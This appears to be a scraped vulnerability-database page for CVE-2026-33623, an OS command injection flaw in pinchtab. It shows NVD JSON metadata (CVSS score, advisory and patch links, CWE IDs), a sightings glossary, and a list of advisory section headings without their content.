      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.2,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "HIGH",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 1.2,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2026-03-26T21:17:06.950",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/pinchtab/pinchtab/commit/25b3374bdcdf0dad32c44d5d726bf953238cd8bd"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Mitigation",
        "Vendor Advisory"
      ],
      "url": "https://github.com/pinchtab/pinchtab/security/advisories/GHSA-p8mm-644p-phmh"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "Exploit",
        "Mitigation",
        "Vendor Advisory"
      ],
      "url": "https://github.com/pinchtab/pinchtab/security/advisories/GHSA-p8mm-644p-phmh"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-78"
        },
        {
          "lang": "en",
          "value": "CWE-400"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-33623 (GCVE-0-2026-33623)

GHSA-P8MM-644P-PHMH

Summary

Details

PoC

Impact

Scope And Limits

Suggested Remediation

Steps to Reproduce:

Additional Observation — Repeated Execution (DoS Amplification)

Impact

FKIE_CVE-2026-33623

Tags

Sightings

Nomenclature